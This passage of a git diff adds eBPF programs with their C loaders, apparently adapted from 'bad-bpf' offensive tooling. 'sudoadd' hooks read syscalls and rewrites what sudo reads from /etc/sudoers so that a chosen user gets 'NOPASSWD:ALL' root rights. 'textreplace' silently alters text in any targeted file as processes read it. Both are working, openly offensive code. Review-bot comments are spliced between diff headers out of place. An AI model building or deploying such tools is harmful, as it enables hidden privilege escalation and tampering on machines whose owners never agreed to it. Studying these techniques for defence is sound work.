+ unsigned int fd = (unsigned int)ctx->ret;
+ bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY);
+
+ return 0;
+}
+
+SEC("tp/syscalls/sys_enter_read")
+int handle_read_enter(struct trace_event_raw_sys_enter *ctx)
+{
+ // Check this open call is opening our target file
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ int pid = pid_tgid >> 32;
+ unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid);
+ if (pfd == 0) {
+ return 0;
+ }
+
+ // Check this is the sudoers file descriptor
+ unsigned int map_fd = *pfd;
+ unsigned int fd = (unsigned int)ctx->args[0];
+ if (map_fd != fd) {
+ return 0;
+ }
+
+ // Store buffer address from arguments in map
+ long unsigned int buff_addr = ctx->args[1];
+ bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY);
+
+ // log and exit
+ size_t buff_size = (size_t)ctx->args[2];
+ return 0;
+}
+
+SEC("tp/syscalls/sys_exit_read")
+int handle_read_exit(struct trace_event_raw_sys_exit *ctx)
+{
+ // Check this open call is reading our target file
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ int pid = pid_tgid >> 32;
+ long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
+ if (pbuff_addr == 0) {
+ return 0;
+ }
+ long unsigned int buff_addr = *pbuff_addr;
+ if (buff_addr <= 0) {
+ return 0;
+ }
+
+ // This is amount of data returned from the read syscall
+ if (ctx->ret <= 0) {
+ return 0;
+ }
+ long int read_size = ctx->ret;
+
+ // Add our payload to the first line
+ if (read_size < payload_len) {
+ return 0;
+ }
+
+ // Overwrite first chunk of data
+ // then add '#'s to comment out rest of data in the chunk.
+ // This sorta corrupts the sudoers file, but everything still
+ // works as expected
+ char local_buff[max_payload_len] = { 0x00 };
+ bpf_probe_read(&local_buff, max_payload_len, (void*)buff_addr);
+ for (unsigned int i = 0; i < max_payload_len; i++) {
+ if (i >= payload_len) {
+ local_buff[i] = '#';
+ }
+ else {
+ local_buff[i] = payload[i];
+ }
+ }
+ // Write data back to buffer
+ long ret = bpf_probe_write_user((void*)buff_addr, local_buff, max_payload_len);
+
+ // Send event
+ struct event *e;
+ e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
+ if (e) {
+ e->success = (ret == 0);
+ e->pid = pid;
+ bpf_get_current_comm(&e->comm, sizeof(e->comm));
+ bpf_ringbuf_submit(e, 0);
+ }
+ return 0;
+}
+
+SEC("tp/syscalls/sys_exit_close")
+int handle_close_exit(struct trace_event_raw_sys_exit *ctx)
+{
+ // Check if we're a process thread of interest
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ int pid = pid_tgid >> 32;
+ unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid);
+ if (check == 0) {
+ return 0;
+ }
+
+ // Closing file, delete fd from all maps to clean up
+ bpf_map_delete_elem(&map_fds, &pid_tgid);
+ bpf_map_delete_elem(&map_buff_addrs, &pid_tgid);
+
+ return 0;
+}
diff --git a/src/26-sudo/sudoadd.c b/src/26-sudo/sudoadd.c
new file mode 100644
index 0000000..fc6e1f3
--- /dev/null
+++ b/src/26-sudo/sudoadd.c
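Review bot: `handle_read_exit` depends on `bpf_probe_write_user`, and loading a program that uses that helper makes the kernel emit a rate-limited warning to the kernel log naming the loading process; that load-time behaviour is undocumented here, and a comment above the call such as `// NOTE: the kernel logs a warning at load time for any program using bpf_probe_write_user; this is the artefact a defender would see in dmesg` would tell readers what to expect. Several locals are assigned and never used — `pid` in `handle_openat_enter`, `handle_openat_exit`, `handle_read_enter` and `handle_close_exit`, and `buff_size` in `handle_read_enter` — which clang reports under the `-Wall` this project builds with; remove them. `handle_openat_exit` stores `ctx->ret` in `map_fds` without checking that openat succeeded, so a negative return is kept as a large unsigned fd until the entry is overwritten; on `ctx->ret < 0` the entry should be deleted instead. The `bpf_probe_read` in `handle_read_exit` is the deprecated address-space-ambiguous form while `handle_openat_enter` already uses `bpf_probe_read_user`; the file should use one consistently.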
@@ -0,0 +1,175 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#include
+#include
+#include "sudoadd.skel.h"
+#include "common_um.h"
+#include "common.h"
+#include
+
+#define INVALID_UID -1
+// https://stackoverflow.com/questions/3836365/how-can-i-get-the-user-id-associated-with-a-login-on-linux
+uid_t lookup_user(const char *name)
+{
+ if(name) {
+ struct passwd *pwd = getpwnam(name); /* don't free, see getpwnam() for details */
+ if(pwd) return pwd->pw_uid;
+ }
+ return INVALID_UID;
+}
+
+// Setup Argument stuff
+#define max_username_len 20
+static struct env {
+ char username[max_username_len];
+ bool restrict_user;
+ int target_ppid;
+} env;
+
+const char *argp_program_version = "sudoadd 1.0";
+const char *argp_program_bug_address = "";
+const char argp_program_doc[] =
+"SUDO Add\n"
+"\n"
+"Enable a user to elevate to root\n"
+"by lying to 'sudo' about the contents of /etc/sudoers file\n"
+"\n"
+"USAGE: ./sudoadd -u username [-t 1111] [-r uid]\n";
+
+static const struct argp_option opts[] = {
+ { "username", 'u', "USERNAME", 0, "Username of user to " },
+ { "restrict", 'r', NULL, 0, "Restict to only run when sudo is executed by the matching user" },
+ { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." },
+ {},
+};
+static error_t parse_arg(int key, char *arg, struct argp_state *state)
+{
+ switch (key) {
+ case 'u':
+ if (strlen(arg) >= max_username_len) {
+ fprintf(stderr, "Username must be less than %d characters\n", max_username_len);
+ argp_usage(state);
+ }
+ strncpy(env.username, arg, sizeof(env.username));
+ break;
+ case 'r':
+ env.restrict_user = true;
+ break;
+ case 't':
+ errno = 0;
+ env.target_ppid = strtol(arg, NULL, 10);
+ if (errno || env.target_ppid <= 0) {
+ fprintf(stderr, "Invalid pid: %s\n", arg);
+ argp_usage(state);
+ }
+ break;
+ case 'h':
+ case ARGP_KEY_ARG:
+ argp_usage(state);
+ break;
+ default:
+ return ARGP_ERR_UNKNOWN;
+ }
+ return 0;
+}
+static const struct argp argp = {
+ .options = opts,
+ .parser = parse_arg,
+ .doc = argp_program_doc,
+};
+
+static int handle_event(void *ctx, void *data, size_t data_sz)
+{
+ const struct event *e = data;
+ if (e->success)
+ printf("Tricked Sudo PID %d to allow user to become root\n", e->pid);
+ else
+ printf("Failed to trick Sudo PID %d to allow user to become root\n", e->pid);
+ return 0;
+}
+
+int main(int argc, char **argv)
+{
+ struct ring_buffer *rb = NULL;
+ struct sudoadd_bpf *skel;
+ int err;
+
+ // Parse command line arguments
+ err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
+ if (err) {
+ return err;
+ }
+ if (env.username[0] == '\x00') {
+ printf("Username Requried, see %s --help\n", argv[0]);
+ exit(1);
+ }
+
+ // Do common setup
+ if (!setup()) {
+ exit(1);
+ }
+
+ // Open BPF application
+ skel = sudoadd_bpf__open();
+ if (!skel) {
+ fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno));
+ return 1;
+ }
+
+ // Let bpf program know our pid so we don't get kiled by it
+ skel->rodata->target_ppid = env.target_ppid;
+
+ // Copy in username
+ sprintf(skel->rodata->payload, "%s ALL=(ALL:ALL) NOPASSWD:ALL #", env.username);
+ skel->rodata->payload_len = strlen(skel->rodata->payload);
+
+ // If restricting by UID, look it up and set it
+ // as this can't really be done by eBPF program
+ if (env.restrict_user) {
+ int uid = lookup_user(env.username);
+ if (uid == INVALID_UID) {
+ printf("Couldn't get UID for user %s\n", env.username);
+ goto cleanup;
+ }
+ skel->rodata->uid = uid;
+ }
+
+ // Verify and load program
+ err = sudoadd_bpf__load(skel);
+ if (err) {
+ fprintf(stderr, "Failed to load and verify BPF skeleton\n");
+ goto cleanup;
+ }
+
+ // Attach tracepoint handler
+ err = sudoadd_bpf__attach( skel);
+ if (err) {
+ fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno));
+ goto cleanup;
+ }
+
+ // Set up ring buffer
+ rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL);
+ if (!rb) {
+ err = -1;
+ fprintf(stderr, "Failed to create ring buffer\n");
+ goto cleanup;
+ }
+
+ printf("Successfully started!\n");
+ while (!exiting) {
+ err = ring_buffer__poll(rb, 100 /* timeout, ms */);
+ /* Ctrl-C will cause -EINTR */
+ if (err == -EINTR) {
+ err = 0;
+ break;
+ }
+ if (err < 0) {
+ printf("Error polling perf buffer: %d\n", err);
+ break;
+ }
+ }
+
+cleanup:
+ sudoadd_bpf__destroy( skel);
+ return -err;
+}
diff --git a/src/27-replace/.gitignore b/src/27-replace/.gitignore
new file mode 100644
index 0000000..81acd4b
--- /dev/null
+++ b/src/27-replace/.gitignore
@@ -0,0 +1,9 @@
+.vscode
+package.json
+*.o
+*.skel.json
+*.skel.yaml
+package.yaml
+ecli
+bootstrap
+textreplace2
diff --git a/src/27-replace/LICENSE b/src/27-replace/LICENSE
new file mode 100644
index 0000000..47fc3a4
--- /dev/null
+++ b/src/27-replace/LICENSE
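Review bot: when `lookup_user` fails, `goto cleanup` is taken with `err` still 0 from `argp_parse`, so `main` destroys the skeleton and exits with status 0 despite having printed an error; set `err = -1;` before that `goto cleanup;`. `lookup_user` returns `uid_t` (unsigned) yet hands back `INVALID_UID` (-1), and the caller stores the result in an `int` before comparing, which only works through two implementation-defined conversions; checking `getpwnam`'s NULL return at the call site, or returning the uid through an `int` out-parameter, would make the failure path explicit. The `username` option's help text `"Username of user to "` ends mid-sentence, `Restict` should be `Restrict`, and `Requried` in the missing-username message should be `Required`. `handle_event` dereferences `data` without checking `data_sz >= sizeof(*e)`, so a short record would be read past its end.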
@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2020, Andrii Nakryiko
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its
+ contributors may be used to endorse or promote products derived from
+ this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/src/27-replace/Makefile b/src/27-replace/Makefile
new file mode 100644
index 0000000..ecfd9e1
--- /dev/null
+++ b/src/27-replace/Makefile
@@ -0,0 +1,141 @@
+# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
+OUTPUT := .output
+CLANG ?= clang
+LIBBPF_SRC := $(abspath ../../libbpf/src)
+BPFTOOL_SRC := $(abspath ../../bpftool/src)
+LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a)
+BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool)
+BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool
+LIBBLAZESYM_SRC := $(abspath ../../blazesym/)
+LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a)
+LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h)
+ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \
+ | sed 's/arm.*/arm/' \
+ | sed 's/aarch64/arm64/' \
+ | sed 's/ppc64le/powerpc/' \
+ | sed 's/mips.*/mips/' \
+ | sed 's/riscv64/riscv/' \
+ | sed 's/loongarch64/loongarch/')
+VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h
+# Use our own libbpf API headers and Linux UAPI headers distributed with
+# libbpf to avoid dependency on system-wide headers, which could be missing or
+# outdated
+INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX))
+CFLAGS := -g -Wall
+ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS)
+
+APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall
+
+CARGO ?= $(shell which cargo)
+ifeq ($(strip $(CARGO)),)
+BZS_APPS :=
+else
+BZS_APPS := # profile
+APPS += $(BZS_APPS)
+# Required by libblazesym
+ALL_LDFLAGS += -lrt -ldl -lpthread -lm
+endif
+
+# Get Clang's default includes on this system. We'll explicitly add these dirs
+# to the includes list when compiling with `-target bpf` because otherwise some
+# architecture-specific dirs will be "missing" on some architectures/distros -
+# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h,
+# sys/cdefs.h etc. might be missing.
+#
+# Use '-idirafter': Don't interfere with include mechanics except where the
+# build would have failed anyways.
+CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \
+ | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }')
+
+ifeq ($(V),1)
+ Q =
+ msg =
+else
+ Q = @
+ msg = @printf ' %-8s %s%s\n' \
+ "$(1)" \
+ "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \
+ "$(if $(3), $(3))";
+ MAKEFLAGS += --no-print-directory
+endif
+
+define allow-override
+ $(if $(or $(findstring environment,$(origin $(1))),\
+ $(findstring command line,$(origin $(1)))),,\
+ $(eval $(1) = $(2)))
+endef
+
+$(call allow-override,CC,$(CROSS_COMPILE)cc)
+$(call allow-override,LD,$(CROSS_COMPILE)ld)
+
+.PHONY: all
+all: $(APPS)
+
+.PHONY: clean
+clean:
+ $(call msg,CLEAN)
+ $(Q)rm -rf $(OUTPUT) $(APPS)
+
+$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT):
+ $(call msg,MKDIR,$@)
+ $(Q)mkdir -p $@
+
+# Build libbpf
+$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf
+ $(call msg,LIB,$@)
+ $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \
+ OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \
+ INCLUDEDIR= LIBDIR= UAPIDIR= \
+ install
+
+# Build bpftool
+$(BPFTOOL): | $(BPFTOOL_OUTPUT)
+ $(call msg,BPFTOOL,$@)
+ $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap
+
+
+$(LIBBLAZESYM_SRC)/target/release/libblazesym.a::
+ $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release
+
+$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT)
+ $(call msg,LIB, $@)
+ $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@
+
+$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT)
+ $(call msg,LIB,$@)
+ $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@
+
+# Build BPF code
+$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL)
+ $(call msg,BPF,$@)
+ $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \
+ $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \
+ -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@)
+ $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@)
+
+# Generate BPF skeletons
+$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL)
+ $(call msg,GEN-SKEL,$@)
+ $(Q)$(BPFTOOL) gen skeleton $< > $@
+
+# Build user-space code
+$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h
+
+$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT)
+ $(call msg,CC,$@)
+ $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@
+
+$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER)
+
+$(BZS_APPS): $(LIBBLAZESYM_OBJ)
+
+# Build application binary
+$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT)
+ $(call msg,BINARY,$@)
+ $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@
+
+# delete failed targets
+.DELETE_ON_ERROR:
+
+# keep intermediate (.skel.h, .bpf.o, etc) targets
+.SECONDARY:
diff --git a/src/27-replace/common.h b/src/27-replace/common.h
new file mode 100644
index 0000000..4686d92
--- /dev/null
+++ b/src/27-replace/common.h
@@ -0,0 +1,35 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#ifndef BAD_BPF_COMMON_H
+#define BAD_BPF_COMMON_H
+
+// These are used by a number of
+// different programs to sync eBPF Tail Call
+// login between user space and kernel
+#define PROG_00 0
+#define PROG_01 1
+#define PROG_02 2
+
+// Used when replacing text
+#define FILENAME_LEN_MAX 50
+#define TEXT_LEN_MAX 20
+
+// Simple message structure to get events from eBPF Programs
+// in the kernel to user spcae
+#define TASK_COMM_LEN 16
+struct event {
+ int pid;
+ char comm[TASK_COMM_LEN];
+ bool success;
+};
+
+struct tr_file {
+ char filename[FILENAME_LEN_MAX];
+ unsigned int filename_len;
+};
+
+struct tr_text {
+ char text[TEXT_LEN_MAX];
+ unsigned int text_len;
+};
+
+#endif // BAD_BPF_COMMON_H
diff --git a/src/27-replace/common_um.h b/src/27-replace/common_um.h
new file mode 100644
index 0000000..06267aa
--- /dev/null
+++ b/src/27-replace/common_um.h
@@ -0,0 +1,96 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#ifndef BAD_BPF_COMMON_UM_H
+#define BAD_BPF_COMMON_UM_H
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+static volatile sig_atomic_t exiting;
+
+void sig_int(int signo)
+{
+ exiting = 1;
+}
+
+static bool setup_sig_handler() {
+ // Add handlers for SIGINT and SIGTERM so we shutdown cleanly
+ __sighandler_t sighandler = signal(SIGINT, sig_int);
+ if (sighandler == SIG_ERR) {
+ fprintf(stderr, "can't set signal handler: %s\n", strerror(errno));
+ return false;
+ }
+ sighandler = signal(SIGTERM, sig_int);
+ if (sighandler == SIG_ERR) {
+ fprintf(stderr, "can't set signal handler: %s\n", strerror(errno));
+ return false;
+ }
+ return true;
+}
+
+static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
+{
+ return vfprintf(stderr, format, args);
+}
+
+static bool bump_memlock_rlimit(void)
+{
+ struct rlimit rlim_new = {
+ .rlim_cur = RLIM_INFINITY,
+ .rlim_max = RLIM_INFINITY,
+ };
+
+ if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) {
+ fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n");
+ return false;
+ }
+ return true;
+}
+
+
+static bool setup() {
+ // Set up libbpf errors and debug info callback
+ libbpf_set_print(libbpf_print_fn);
+
+ // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything
+ if (!bump_memlock_rlimit()) {
+ return false;
+ };
+
+ // Setup signal handler so we exit cleanly
+ if (!setup_sig_handler()) {
+ return false;
+ }
+
+ return true;
+}
+
+
+#ifdef BAD_BPF_USE_TRACE_PIPE
+static void read_trace_pipe(void) {
+ int trace_fd;
+
+ trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0);
+ if (trace_fd == -1) {
+ printf("Error opening trace_pipe: %s\n", strerror(errno));
+ return;
+ }
+
+ while (!exiting) {
+ static char buf[4096];
+ ssize_t sz;
+
+ sz = read(trace_fd, buf, sizeof(buf) -1);
+ if (sz > 0) {
+ buf[sz] = '\x00';
+ puts(buf);
+ }
+ }
+}
+#endif // BAD_BPF_USE_TRACE_PIPE
+
+#endif // BAD_BPF_COMMON_UM_H
\ No newline at end of file
diff --git a/src/27-replace/textreplace.bpf.c b/src/27-replace/textreplace.bpf.c
new file mode 100644
index 0000000..648829d
--- /dev/null
+++ b/src/27-replace/textreplace.bpf.c
@@ -0,0 +1,336 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#include "vmlinux.h"
+#include
+#include
+#include
+#include "common.h"
+
+char LICENSE[] SEC("license") = "Dual BSD/GPL";
+
+// Ringbuffer Map to pass messages from kernel to user
+struct {
+ __uint(type, BPF_MAP_TYPE_RINGBUF);
+ __uint(max_entries, 256 * 1024);
+} rb SEC(".maps");
+
+// Map to hold the File Descriptors from 'openat' calls
+struct {
+ __uint(type, BPF_MAP_TYPE_HASH);
+ __uint(max_entries, 8192);
+ __type(key, size_t);
+ __type(value, unsigned int);
+} map_fds SEC(".maps");
+
+// Map to fold the buffer sized from 'read' calls
+struct {
+ __uint(type, BPF_MAP_TYPE_HASH);
+ __uint(max_entries, 8192);
+ __type(key, size_t);
+ __type(value, long unsigned int);
+} map_buff_addrs SEC(".maps");
+
+// Map to fold the buffer sized from 'read' calls
+// NOTE: This should probably be a map-of-maps, with the top-level
+// key bing pid_tgid, so we know we're looking at the right program
+#define MAX_POSSIBLE_ADDRS 500
+struct {
+ __uint(type, BPF_MAP_TYPE_ARRAY);
+ __uint(max_entries, MAX_POSSIBLE_ADDRS);
+ __type(key, unsigned int);
+ __type(value, long unsigned int);
+} map_name_addrs SEC(".maps");
+struct {
+ __uint(type, BPF_MAP_TYPE_ARRAY);
+ __uint(max_entries, MAX_POSSIBLE_ADDRS);
+ __type(key, unsigned int);
+ __type(value, long unsigned int);
+} map_to_replace_addrs SEC(".maps");
+
+// Map holding the programs for tail calls
+struct {
+ __uint(type, BPF_MAP_TYPE_PROG_ARRAY);
+ __uint(max_entries, 5);
+ __type(key, __u32);
+ __type(value, __u32);
+} map_prog_array SEC(".maps");
+
+// Optional Target Parent PID
+const volatile int target_ppid = 0;
+
+// These store the name of the file to replace text in
+const int filename_len_max = 50;
+const volatile int filename_len = 0;
+const volatile char filename[filename_len_max];
+
+// These store the text to find and replace in the file
+const unsigned int text_len_max = 20;
+const volatile unsigned int text_len = 0;
+const volatile char 
text_find[filename_len_max];
+const volatile char text_replace[filename_len_max];
+
+SEC("tp/syscalls/sys_exit_close")
+int handle_close_exit(struct trace_event_raw_sys_exit *ctx)
+{
+ // Check if we're a process thread of interest
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ int pid = pid_tgid >> 32;
+ unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid);
+ if (check == 0) {
+ return 0;
+ }
+
+ // Closing file, delete fd from all maps to clean up
+ bpf_map_delete_elem(&map_fds, &pid_tgid);
+ bpf_map_delete_elem(&map_buff_addrs, &pid_tgid);
+
+ return 0;
+}
+
+SEC("tp/syscalls/sys_enter_openat")
+int handle_openat_enter(struct trace_event_raw_sys_enter *ctx)
+{
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ int pid = pid_tgid >> 32;
+ // Check if we're a process thread of interest
+ // if target_ppid is 0 then we target all pids
+ if (target_ppid != 0) {
+ struct task_struct *task = (struct task_struct *)bpf_get_current_task();
+ int ppid = BPF_CORE_READ(task, real_parent, tgid);
+ if (ppid != target_ppid) {
+ return 0;
+ }
+ }
+
+ // Get filename from arguments
+ char check_filename[filename_len_max];
+ bpf_probe_read_user(&check_filename, filename_len, (char*)ctx->args[1]);
+
+ // Check filename is our target
+ for (int i = 0; i < filename_len; i++) {
+ if (filename[i] != check_filename[i]) {
+ return 0;
+ }
+ }
+
+ // Add pid_tgid to map for our sys_exit call
+ unsigned int zero = 0;
+ bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY);
+
+ bpf_printk("[TEXT_REPLACE] PID %d Filename %s\n", pid, filename);
+ return 0;
+}
+
+SEC("tp/syscalls/sys_exit_openat")
+int handle_openat_exit(struct trace_event_raw_sys_exit *ctx)
+{
+ // Check this open call is opening our target file
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid);
+ if (check == 0) {
+ return 0;
+ }
+ int pid = pid_tgid >> 32;
+
+ // Set the map value to be the returned file descriptor
+ unsigned int fd = (unsigned 
int)ctx->ret;
+ bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY);
+
+ return 0;
+}
+
+SEC("tp/syscalls/sys_enter_read")
+int handle_read_enter(struct trace_event_raw_sys_enter *ctx)
+{
+ // Check this open call is opening our target file
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ int pid = pid_tgid >> 32;
+ unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid);
+ if (pfd == 0) {
+ return 0;
+ }
+
+ // Check this is the correct file descriptor
+ unsigned int map_fd = *pfd;
+ unsigned int fd = (unsigned int)ctx->args[0];
+ if (map_fd != fd) {
+ return 0;
+ }
+
+ // Store buffer address from arguments in map
+ long unsigned int buff_addr = ctx->args[1];
+ bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY);
+
+ // log and exit
+ size_t buff_size = (size_t)ctx->args[2];
+ bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx\n", pid, fd, buff_addr);
+ bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_size %lu\n", pid, fd, buff_size);
+ return 0;
+}
+
+SEC("tp/syscalls/sys_exit_read")
+int find_possible_addrs(struct trace_event_raw_sys_exit *ctx)
+{
+ // Check this open call is reading our target file
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
+ if (pbuff_addr == 0) {
+ return 0;
+ }
+ int pid = pid_tgid >> 32;
+ long unsigned int buff_addr = *pbuff_addr;
+ long unsigned int name_addr = 0;
+ if (buff_addr <= 0) {
+ return 0;
+ }
+
+ // This is amount of data returned from the read syscall
+ if (ctx->ret <= 0) {
+ return 0;
+ }
+ long int buff_size = ctx->ret;
+ long int read_size = buff_size;
+
+ bpf_printk("[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx\n", pid, read_size, buff_addr);
+ // 64 may be to large for loop
+ const unsigned int local_buff_size = 32;
+ const unsigned int loop_size = 32;
+ char local_buff[local_buff_size] = { 0x00 };
+
+ if (read_size > (local_buff_size+1)) {
+ // Need to loop :-(
+ read_size = 
local_buff_size;
+ }
+
+ // Read the data returned in chunks, and note every instance
+ // of the first character of our 'to find' text.
+ // This is all very convoluted, but is required to keep
+ // the program complexity and size low enough the pass the verifier checks
+ unsigned int tofind_counter = 0;
+ for (unsigned int i = 0; i < loop_size; i++) {
+ // Read in chunks from buffer
+ bpf_probe_read(&local_buff, read_size, (void*)buff_addr);
+ for (unsigned int j = 0; j < local_buff_size; j++) {
+ // Look for the first char of our 'to find' text
+ if (local_buff[j] == text_find[0]) {
+ name_addr = buff_addr+j;
+ // This is possibly out text, add the address to the map to be
+ // checked by program 'check_possible_addrs'
+ bpf_map_update_elem(&map_name_addrs, &tofind_counter, &name_addr, BPF_ANY);
+ tofind_counter++;
+ }
+ }
+
+ buff_addr += local_buff_size;
+ }
+
+ // Tail-call into 'check_possible_addrs' to loop over possible addresses
+ bpf_printk("[TEXT_REPLACE] PID %d | tofind_counter %d \n", pid, tofind_counter);
+
+ bpf_tail_call(ctx, &map_prog_array, PROG_01);
+ return 0;
+}
+
+SEC("tp/syscalls/sys_exit_read")
+int check_possible_addresses(struct trace_event_raw_sys_exit *ctx) {
+ // Check this open call is opening our target file
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
+ if (pbuff_addr == 0) {
+ return 0;
+ }
+ int pid = pid_tgid >> 32;
+ long unsigned int* pName_addr = 0;
+ long unsigned int name_addr = 0;
+ unsigned int newline_counter = 0;
+ unsigned int match_counter = 0;
+
+ char name[text_len_max+1];
+ unsigned int j = 0;
+ char old = 0;
+ const unsigned int name_len = text_len;
+ if (name_len < 0) {
+ return 0;
+ }
+ if (name_len > text_len_max) {
+ return 0;
+ }
+ // Go over every possibly location
+ // and check if it really does match our text
+ for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) {
+ newline_counter = i;
+ pName_addr = 
bpf_map_lookup_elem(&map_name_addrs, &newline_counter);
+ if (pName_addr == 0) {
+ break;
+ }
+ name_addr = *pName_addr;
+ if (name_addr == 0) {
+ break;
+ }
+ bpf_probe_read_user(&name, text_len_max, (char*)name_addr);
+ for (j = 0; j < text_len_max; j++) {
+ if (name[j] != text_find[j]) {
+ break;
+ }
+ }
